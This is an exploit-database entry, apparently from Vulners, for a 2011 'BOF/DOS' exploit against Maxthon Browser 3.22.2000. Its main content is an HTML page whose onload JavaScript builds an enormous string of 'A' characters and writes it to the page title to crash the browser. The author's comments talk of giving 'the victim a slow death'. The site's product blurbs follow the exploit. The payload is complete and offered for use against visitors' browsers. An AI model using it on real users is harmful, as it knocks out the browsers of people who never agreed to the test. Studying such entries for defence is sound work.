`#(+)Exploit Title: Maxthon Browser 3.22.2000 0day BOF/DOS Exploit
#(+)Created By: ^Xecuti0n3r
#(+)Software : Maxthon Browser
#(+)Version : 3.22.2000
#(+)Tested On : Win-XP-Sp3
#(+) Date : 23.04.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecuti0n3r()yahoo.com
CODE:
______________________________________________________________________________________________________
______________________________________________________________________________________________________
<HTML>
<HEAD>
<TITLE> Maxthon Browser 0day BOF/DOS Exploit </TITLE>
</HEAD>
<SCRIPT type="text/javascript">
<!-- Wanna give the victim a slow death..then put the value of overflow vector "x" as x = 10000-->
function overflow()
{ var poc1 = "";
for (var x = 0;x < 20000; x++)
{
poc1 += "A";
}
var poc2 = poc1; <!-- poc2 = poc is the actual buffer which causes overflow -->
for (x = 0; x < 20000; x++) {
poc2 += poc1;
}
document.title = poc2;
}
</SCRIPT>
</TITLE>
<BODY onload="javascript:overflow();" >
</BODY>
</HTML>
______________________________________________________________________________________________________
______________________________________________________________________________________________________
#######################
(+)Exploit Coded by: ^Xecuti0n3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
#######################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation